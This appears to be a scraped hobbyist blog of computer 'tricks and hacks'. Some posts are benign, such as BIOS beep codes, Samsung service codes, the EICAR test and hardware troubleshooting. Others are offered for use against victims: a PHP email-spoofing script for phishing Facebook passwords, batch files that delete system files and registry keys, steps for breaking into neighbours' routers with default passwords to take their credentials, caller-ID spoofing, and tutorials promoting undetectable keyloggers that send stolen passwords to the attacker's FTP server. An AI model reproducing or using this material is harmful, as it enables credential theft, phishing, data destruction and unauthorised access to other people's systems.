shortcuts you can use with Windows Explorer:


Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW

beep codes and error codes ??

beep codes and error codes ??
After repeated requests for beep codes i have decided to post them here maybe they could be pinned

Standard Original IBM POST Error Codes
Code Description

1 short beep System is OK
2 short beeps POST Error - error code shown on screen No beep Power supply or system board problem Continuous beep Power supply, system board, or keyboard problem Repeating short beeps Power supply or system board problem
1 long, 1 short beep System board problem
1 long, 2 short beeps Display adapter problem (MDA, CGA)
1 long, 3 short beeps Display adapter problem (EGA)
3 long beeps 3270 keyboard card
IBM POST Diagnostic Code Descriptions
Code Description
100 - 199 System Board
200 - 299 Memory
300 - 399 Keyboard
400 - 499 Monochrome Display
500 - 599 Colour/Graphics Display
600 - 699 Floppy-disk drive and/or Adapter
700 - 799 Math Coprocessor
900 - 999 Parallel Printer Port
1000 - 1099 Alternate Printer Adapter
1100 - 1299 Asynchronous Communication Device, Adapter, or Port
1300 - 1399 Game Port
1400 - 1499 Colour/Graphics Printer
1500 - 1599 Synchronous Communication Device, Adapter, or Port
1700 - 1799 Hard Drive and/or Adapter
1800 - 1899 Expansion Unit (XT)
2000 - 2199 Bisynchronous Communication Adapter
2400 - 2599 EGA system-board Video (MCA)
3000 - 3199 LAN Adapter
4800 - 4999 Internal Modem
7000 - 7099 Phoenix BIOS Chips
7300 - 7399 3.5" Disk Drive
8900 - 8999 MIDI Adapter
11200 - 11299 SCSI Adapter
21000 - 21099 SCSI Fixed Disk and Controller
21500 - 21599 SCSI CD-ROM System

AMI BIOS Beep Codes
Code Description

1 Short Beep System OK
2 Short Beeps Parity error in the first 64 KB of memory
3 Short Beeps Memory failure in the first 64 KB
4 Short Beeps Memory failure in the first 64 KB Operational of memory
or Timer 1 on the motherboard is not functioning
5 Short Beeps The CPU on the motherboard generated an error
6 Short Beeps The keyboard controller may be bad. The BIOS cannot switch to protected mode
7 Short Beeps The CPU generated an exception interrupt
8 Short Beeps The system video adapter is either missing, or its memory is faulty
9 Short Beeps The ROM checksum value does not match the value encoded in the BIOS
10 Short Beeps The shutdown register for CMOS RAM failed
11 Short Beeps The external cache is faulty
1 Long, 3 Short Beeps Memory Problems
1 Long, 8 Short Beeps Video Card Problems

Phoenix BIOS Beep Codes
Note - Phoenix BIOS emits three sets of beeps, separated by a brief pause.

Code Description
1-1-3 CMOS read/write failure
1-1-4 ROM BIOS checksum error
1-2-1 Programmable interval timer failure
1-2-2 DMA initialisation failure
1-2-3 DMA page register read/write failure
1-3-1 RAM refresh verification failure
1-3-3 First 64k RAM chip or data line failure
1-3-4 First 64k RAM odd/even logic failure
1-4-1 Address line failure first 64k RAM
1-4-2 Parity failure first 64k RAM
2-_-_ Faulty Memory
3-1-_ Faulty Motherboard
3-2-4 Keyboard controller Test failure
3-3-4 Screen initialisation failure
3-4-1 Screen retrace test failure
3-4-2 Search for video ROM in progress
4-2-1 Timer tick interrupt in progress or failure
4-2-2 Shutdown test in progress or failure
4-2-3 Gate A20 failure
4-2-4 Unexpected interrupt in protected mode
4-3-1 RAM test in progress or failure>ffffh
4-3-2 Faulty Motherboard
4-3-3 Interval timer channel 2 test or failure
4-3-4 Time of Day clock test failure
4-4-1 Serial port test or failure
4-4-2 Parallel port test or failure
4-4-3 Math coprocessor test or failure
Low 1-1-2 System Board select failure
Low 1-1-3 Extended CMOS RAM failure

Email Hacking ?

Email Hacking ?
What is email spoofing:=
E-mail spoofing is the forgery of an e-mail header so that the message appears to have originated from someone or somewhere other than the actual source...

So lets get started


For email spoofing we need about four things
PHP script
Filezilla(FTP client software)
a webhosting site
victim's email

Here is that php script


Code: [Select all]


<?php

$to = 'victim email';

$subject = 'subject(example:-Account hacked!!)';

$message = 'message(example:-your facebook account is hacked so please reply to this email with your old username and password of facebook)';

$header = 'From: from fake email(example:facebook@support.com)
Reply-To: reply to real email(your email)';

$mail = mail($to,$subject,$message,$header);

if($mail) {
echo 'Email sent to '.$to;
}
?>

Ok now select a webhosting site

I prefer 000webhost


now select a domain name and after that go to cpanel for user name and password because u have to upload the php script

the last thing u need is Filezilla
(ftp client software)
Download filezilla

http://filezilla-project.org/download.php

After that open filezilla

now go to cpanel of ur website and copy the host name & username

Now open filezilla and paste hostname username and password

After editing, upload that php script(test.php)

Now open in your browser domainname.com/test.php

Now If your victim reply to your email then u will surely get that email id and password

Samsung mobile phone Secret Codes ?

Samsung mobile phone Secret Codes ?
Samsung mobile phone Secret Codes
IMEI : *#06#

Software version : *#1234#

FTA S/w version : *#1111#

Hardware info : *#2222#

F/W and H/W version : *#0206*8376263#

Test menu : *#0*#

battery info : *#0228#

*** Reset : *2767*3855#

GPRS info : *#4777*8665#

Bluetooth ID : *#232337#

LCD Brightness : *#8999*523#

Call List : *#2255#

External Displayl : *#8999*3825523#

Java Status Code : #*536961#

This code has something to do with phone locking. : *#7465625#


Software version : *#9999#
Same HW/SW version thing : *#8377466#
Check the locks : *#7465625#
Enables Network lock : *7465625*638*Code#
Disables Network lock : #7465625*638*Code#
Enables Subset lock : *7465625*782*Code#
Disables Subset lock : #7465625*782*Code#
Enables SP lock : *7465625*77*Code#
Disables SP lock : #7465625*77*Code#
Enables CP lock : *7465625*27*Code#
Disables CP lock : #7465625*27*Code#
Enables SIM lock : *7465625*746*Code#
Disables SIM lock : #7465625*746*Code#
Activa lock ON : *7465625*228#
Activa lock OFF : #7465625*228#
Auto Network lock ON : *7465625*28638#
Auto Network lock OFF : #7465625*28638#
Auto subset lock ON : *7465625*28782#
Auto subset lock OFF : #7465625*28782#
*#06# -> Show IMEI
*#9999# -> Show Software Version
*#0837# -> Show Software Version (instructions)
*#0001# -> Show Serial Parameters
*#9125# -> Activates the smiley when charging.
*#9998*228# -> Battery status (capacity, voltage, temperature)
*#9998*246# -> Program status
*#9998*289# -> Change Alarm Buzzer Frequency
*#9998*324# -> Debug screens
*#9998*364# -> Watchdog
*#9998*377# -> EEPROM Error Stack - Use side keys to select values. Cancel and ok.
*#9998*427# -> Trace Watchdog
*#9998*523# -> Change LCD

How-To: Change Your IP Address in Windows ?

How-To: Change Your IP Address in Windows ?
Note: This procedure changes the IP address of a computer on a wired or wireless network. If you want to change the IP address of your internet connection, you should contact your service provider, as they're the ones who exert control over this.

To change your network IP address in Windows XP, Vista, or 7:

1. Press the Windows Key and R

2. Type command and press Enter. This loads your DOS prompt

3. Type ipconfig /release then press Enter. This disables your internet connection

4. Go to your desktop, and right-click on something called Network Place or My Network Places (If you're using Windows Vista or 7, look for the Network and Sharing Center through Control Panel)

5. Click Properties. You should now see something called Local Area Connection or something similar

6. Right-click on your connection (titled Local Area Connection if you're using an ethernet cable or Wireless Network Connection if you're on WiFi) and click Properties

7. Under the General tab, double-click on the Internet Protocol (TCP/IP)

8. A new window appears. On its own General tab, click the box beside Use the following IP address

9. Type in ones until you fill the box up (it should read 111.111.111.111
)

10. Press Tab. You'll notice the Subnet Mask section automatically fill sup with numbers

11. Click OK

12. Click OK to bring you back to the "Local Area Connection" screen

13. Right-click Local Area Connection and Click on Properties again

14. Again, under the General tab, double-click on the Internet Protocol (TCP/IP)

15. Select Obtain an IP address automatically

16. Click OK

17. Click OK

18. Go back to your DOS prompt, type "ipconfig /renew" and press Enter. This restores your internet connection.

By now, the network should've assigned a new IP address to your computer automatically.

Tuesday, 19 June 2012

create an empty folder with no name ?

create an empty folder with no name ?
I think most of u know how to create a folder without name

but im gonna explain it again

first create a folder ----->  the foldername will b  newfolder(n);

rename it  by pressing f2 ;

then from numberpad  press 0160 by pressing alt  (i mean  alt+0160)

it creates an empty character generally if we press any numbers on numberpad  by holding alt spl charecters are enabled

each value has a separate spl character    0160 for empty charecter

using this u can create an empty folder

if u wanna make that folder invisible then change the icon to no icon  there is a space in icons thats invisible icon

after changing the icon goes  invisible if u wanna make it completely invisible

just make it readonly  and hidden and have fun

BOOT WINDOWS 7 AT DOUBLE SPEED ?

BOOT WINDOWS 7 AT DOUBLE SPEED ?
ONLY FOR MULTI CORES OR MULTI PROCESSORS LIKE DUAL CORE , CORE 2 DUO ETC...


GO to:::

START --> RUN --> BOOT (tab) --> ADVANCED OPTIONS -->

.
Check check box "Number of processors"....
.
in the drop down below select maximum number ..
.
OK-->APPLY-->RESTART

How to call your friends with their own number ?

How to call your friends with their own number ?
with useful prank to confuse your friends. With this mobile hack, you can call your friends with their own mobile number… meaning by, they will see their own number calling them. Just follow the guidelines I have mentioned in this mobile hack article.

 
1. Go to http://www.mobivox.com and register there for free account.

2. During registration, remember to insert Victim mobile number in "Phone number”

3. Complete registration and confirm your email id and then login to your account. Click on "Direct WebCall”

4. In "Enter a number” box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now” button to call your friend with his own number.

5. That’s it. Your friend will be shocked to see his own number calling him.

Thus, use this to surprise and shock your friends. This mobile hack is free. So, you don’t need to lose a buck. Simply register and you’ll be able to perform this mobile hack. This mobile hack is available for almost all countries and all cell phones network providers

Enjoy mobile hack…

Microsoft's Calculator failed in following calculation ?

Microsoft's Calculator failed in following calculation ?
Microsoft's Calculator failed in following calculation.

Go to Start-->Run-->type Calc and Check the following... .

2704/50 = 54.08 Works Fine
2704/51 = 53.01960784 Works Fine
2704/52 = Try yourself Doesn't Work


2704/53 = 51.01886792 Works Fine
2704/54 = 50.07407407 Works Fine

Microsoft Calculator Failed

Try it ....

Vodafone Hack For Free GPRS working 100%

Vodafone Hack For Free GPRS working 100%

This method has been tested on different mobiles and has been confirmed to be working.
Followng are the Settings you require to configure on your Mobile:
Account Name: Vodafone_gprs
Homepage: hxxp://live.vodafone.in
User Name: (no need)
Pass: (no need)
Access Point Settings :-
Proxy: Enabled
Proxy Address: 10.10.1.100
Proxy Port: 9401
Data Bearer: Packet Data
Bearer Settings :-
Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)
*IF that happen this settings is not working then change the proxy port number to:-
Proxy Port: 9401

Increase Hard Disk Speed in Windows ?

Increase Hard Disk Speed in Windows ?
If you like to increase/optimize your Hard Disk I/O – read/write speed without buying expensive software utilities to do that job, just follow next steps. With doing these steps you will increase Hard disk speed (depends of manufacture and specification, but its worth to try). The most speed improvement is visible with IDE drives; however there are reports that this tweak also does good for SCSI disks.
In any case, it won't harm your system, so try it yourself and let me know what you find!
Steps:
1. Run SYSEDIT.EXE from the start.
2. Expand the system.ini file window.
3.  find a line called [386enh].
4. Press Enter to make one blank line, and in that line type
5. Irq14=4096 (note: This line IS CASE SENSITIVE)
6. Click on the File menu, then choose Save.
7. Close SYSEDIT and reboot your computer.
8. Restart windows!
The speed improvement will be noticed just after the system reboots, any system info. software can be used to check the improvement.

How to Test working of your Antivirus ?

How to Test working of your Antivirus ?
Have you ever wondered how to test your Antivirus software to ensure it’s proper working? Well here is a quick and easy way to test your antivirus. The process is called EICAR test which will work on any antivirus and was developed by European Institute of Computer Antivirus Research. This process can be used by people, companies and antivirus programmers to test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can cause damage to the computer. Here is a step-by-step procedure to test your antivirus.

1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

2. Rename the file from New Text Document.TXT to myfile.com

3. Now run the antivirus scan on this myfile.com file.

If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.

NOTE: Most antivirus will pop-out a warning message in the Step-1 itself.

You can also place the myfile.com file in a ZIP or RAR file and run a scan on it so as to ensure whether your antivirus can detect the test string in the compressed archive. Any antivirus when scanning this file will respond exactly as it will do for a genuine virus/malicious code. This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence it is the safest method to test the proper functioning of any antivirus.

Invisible folder ?

Invisible folder ?
I know that you know how to make a folder hidden, but ever tried to make it invisible, no?? then here goes how..............

First step is to erase the name of your folder, right click the folder and click rename, clear the old name and then hold the "Alt" key on your keyboard and type in "255", press enter. See, there's no name for your folder now (actually that's the ASCII value for 255 ).

Now comes d second step , i.e 2 make your folder invisible, as simple as the first one, right click the folder, go to properties and select customize, click the change icon button on the bottom, you will see lots of icons now browse until you find a blank icon, select the icon, click ok and then click apply.

Khallas!! your folder has gone invisible!!

Now don't blame me if u cant find it  (its there in the original position, its just that you cant see it
(that's why you call it invisible).

Reply me if u like it,

Thanx

How to Download Torrent file from IDM ?

How to Download Torrent file from IDM ?
Instructions :
Step 1: Copy the url of your torrent.

Step 2 : go to http://torrific.com/  or  http://www.bitlet.org   and singup, its simple. register one time so you can download more files when needed.

Step 3 :Then paste the url and click get.

Step 4 : And u are directed to the web page of the torrent and click download torrent

Step 5 : Your download is ready . now copy the link and paste in IDM

How To Block Websties Without Software, block webs ?

How To Block Websties Without Software, block webs ?

Steps:
1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.
5] Done!
-So-
127.0.0.1 localhost
127.0.0.2 www.blockedsite.com

Call your Friend using his own number... ?

Call your Friend using his own number... ?


Hello Friends after "Make Free Phone Calls From PC to mobile for free" hack today I am sahring With you a extremely Nice Prank or you can simply say Hack i.e "How To Call Your Friends From THeir Own Cell Number".
I was asked by many Friends to Write Tutorials about mobile hacks and Pranks . So I am Sharing My Second Mobile Extreme Prank With You all. Enjoy and Have Fun And GO on Reading...

Mobile hack to call your friends:

1. Go to
Code:
http://www.mobivox.com/

and register there for free account.

2. During registration, remember to insert Victim mobile number in "Phone number" field as shown below.



3. Complete registration and confirm your email id and then login to your account. Click on "Direct WebCall".


4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.


5. That's it. Your friend will be shocked to see his own number calling him. I have spent last two days simply playing this cool mobile hack prank.

That All The Full Tutorial . I think have Enjoyed It reading and Well Understood What to do?
If you are facing Any Problem Ask me I am there to help you Out . Enjoy and have Fun. :hi:

CMD Trix

cmd trix ?
The blue screen of Death [this might be dangerous]
*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again


CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00



-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer


CODE
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c "Error! You are too stupid!" -s -t 10


-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)


CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE


-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*

CODE
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


-Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*
CODE
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


-Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*
CODE
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


-Endless Backspace
*This makes it so the backspace key is constantly being pressed*
CODE
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


-Popping CD Drives
*This will make the CD drives constantly pop out*
CODE
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

Hack Your Broadband (No Risk) ?

Hack Your Broadband (No Risk) ?
Step 1: Download any port Scanner (i preffer Super Scan or IPscanner)

Step 2: First Get your ip from
CODE www.whatismyip.com
Asume your IP to be 59.x.x.17

Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range
start:59.x.x.1 to End:59.x.x.255


Step 4: Then check in your scanner which alive IPs has the port 80 open

Step 5: Enter that alive IP in your web browser

Step 6: It asks for user , pass
Type u
User=admin
Password=admin or password
It is the default password for most of the routers.

if denied then use on another alive IP

Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.

Step 8: use ShowPassword or Revelation software to view the password in asterisks

Now You have Username/Password
Enjoy!

Common Hardware and Software Issues

 Common Hardware and Software Issues
One symptom that users rely on in assessing whether or not a system is infected with malware is the overall performance of the computer. A user may experience periodic stalls, system crashes, etc. While many of these symptoms can and do reflect a system compromised by malicious software, simple hardware and software issues can lead to the same type of observations.
Some specific items to consider that can yield an unstable system include:
  • If the CPU has a fan, is the fan working properly? Overheating of the CPU generally yields system crashes and/or lock ups. Usually the system will behave fine from a cold start, fail sometime later, and experience variable results on attempted restarts. The problem may appear intermittent, but will often be tied to the computational load being placed on the system as well as ambient temperature and/or season of the year. To diagnose: run the system while the case is open to verify that the fan actually works. As a moving part, a fan is one of the components that have an expected high rate of failure.
  • If fans appear to be working, are they able to adequately deliver airflow to the needed areas? It is important to understand that the airflow through a computer case over a number of years can deposit a large amount of dust/lint onto a system, providing thermal insulation to covered components or disrupted airflow through case openings. If the inner workings of your PC are encased in dust, carefully remove that dust. Generally, a vacuum with a fine nozzle attachment held away from the components provides more than enough suction to do the job. Pressurized air/gas will also do the job, but generally creates a minor dust cloud and a mess outside the case in the process.
  • Is a CD/DVD drive not working? Check that the read/write laser is working and that the lens system is not scratched or covered with dust. A lens cleaning CD will often help with dust issues. Laser issues are often apparent by verifying that a disc is readable on all CD/DVD drives except the questionable one. The only reasonable course of action here is replacement of the drive.
  • If system performance is lagging, the most obvious first step is to identify the processes that are pulling the greatest fraction of CPU cycles. The processes which draw the most CPU resources may not be the critical issue, but they may be indirectly related. In any event, it will narrow the field. The Windows Task Manager is obviously a place to start examining system process performance issues.
  • Assess the set of applications that are always launched on system start. If there are infrequently used applications, which are always running, this is generally an area in which to trim utilization of system resources.
  • Verify that the system has sufficient RAM for the task load that is run. Compare the total and peak commit charges against total physical RAM under the Performance tab of the task manager in Windows. You don’t want to be working in a scenario where the commit charge routinely exceeds physical RAM.
  • Is your system littered with gigabytes of temporary files and so on? Take a moment to perform a small amount of system hygiene by running CCleaner. The more advanced user may perform a bit of registry straightening and examination/pruning of startup entries.
The underlying message is that you shouldn’t automatically presume that all unexpected or unanticipated issues experienced using a computer is due to malware.
Consider, explore, and rule out the more common explanations before leaping to the conclusion that you’re infected. You may very well be infected, but similar symptoms can arise from many sources.
 

How To Hack Facebook/Myspace/Orkut Or Any Email By Keylogging Fud Long Time

How To Hack Facebook/Myspace/Orkut Or Any Email By Keylogging
Fud Long Time
 

Rapzo Logger v 1.5 ( Public Edition )By Rapid

" Virus Results By Scan4you.net 0/32 "(Paid Host )







Options
Stealers [6] All Stealers Pure Code - No Drops + Runtime FUD

[#] Firefox 3.5.0-3.6.X
[#] DynDns
[#] FileZilla
[#] Pidgin
[#] Imvu
[#] No-Ip

Features [25]

* Full UAC Bypass & Faster Execution
* Coded in Vb.NET
* Min Req Is .net 2.0 Now A days every pc Have it
* Cool & user friendly GUI
* Easily Understandble
* Encrypt Information
* Encrypt E-mail information
* 100% FUD from all AV's
* 4 Extentions [ . exe | .scr | .pif | .com ]
* Keylogger support - Smtp[Gmail,Hotmail,live,aol,]
* Test E-mail - is it vaild or not.
* Customize the "To" e-mail address.
* Screen Logger
* Cure.exe to remove server from your Compute
* Usb Spreade
* File pumper - Built-in
* Icon Changer - Preview
* Logs are nice and clear
* Log Letters - ABCD etc.
* Log Symbols - !@#$% etc.
* Log Numbers - 12345 etc.
* Log specific key's - [F4][F5][TAB][HOME][Pg Dn][Pause Break][Prtsc SysRq].. Etc.
* Hidden really good & invisible
* Send new logs over and over again
* ReadMe.txt - How To Use
* Vedio Tutorial - How To Use
Working on all Windows Operating System's - [Winxp\vista\W7] --- [32 + 64 ] Bit Computers




http://www.mediafire.com/?belchwxdl6z2xl9



THANK YOU
FROM ABBAS ASEEM.

Hack Yahoo Accounts



Hello Friends here is One More tutorial about hacking Facebook , Hotmail ,Yahoo ,Gmail ,Twitter ,orkut ,myspace and msn accounts with easy as 1 2 3 . In my previous article, I mentioned about  Armadax Key logger for Hacking Hotmail, Yahoo, Myspace and Msn account passwords.
Today i am Introducing a very effective key logger namely Vicspy key logger - the key logger that I found extremely Good and user-friendly for hacking hotmail, yahoo account passwords. I have provided link for software download and password ... So Enjoy and Let's Begin the Tutorial .

Hacking Facebook,hotmail,Yahoo,Gmail,Twitter,orkut,myspace and msn Passwords


1. Download Vicspy keylogger for hacking Hotmail, Yahoo, msn ,myspace ,Face book And Gmail account passwords.

2. Extract the Rar to obtain Vicspy keylogger.

3. Simply run peditor.exe to get key logger interface and create a key logger for hacking hotmail, yahoo and msn account password. No need to install software on computer.


4. Now, in Servers , fill in the FTP server which you wanna use to receive logs from keylogger.

Fill in ftp server as:

where:
# user: your username at ftp server.
# pass: your password.
# logs: create a new folder named "logs" at your ftp server. You will receive hotmail, yahoo and msn hacked passwords in this folder.
# ftp.example.com : your ftp server address. (eg: ftp.drivehq.com for drivehq ftp server)

After you have completed filling ftp server, hit on "Check" just adjacent to it to check whether you have entered ftp server correctly and whether server is available.

5.
In Control, check "Melt" to make key logger evaporate after installation on victim computer.

6. Additional Options included in Vicspy key logger are that you can
- Change keylogger file icon
- Bind key logger with another file to make it undetectable by victim.

7. Now, simply choose the path where you want key logger to be saved and hit on "Create" to create key logger file at preferred destination.

8. Now, send this file to your victim and make him to install this binded keylogged file on his computer (Social engineering). You can crypt this keylogger file and then use Fake error message generator to make our key logger undetectable by antivirus.

Once the victim installs key logger on his computer, you will start receiving all typed passwords on his computer in your FTP server account (in logs folder). Thus, our target of hacking hotmail, yahoo, msn account password accomplished.

That's ALL About Vicspy Key logger for hacking Facebook,hotmail,Yahoo,Gmail,Twitter,orkut,myspace and msn account passwords. Vicspy keylogger can also be used for hacking other email account passwords.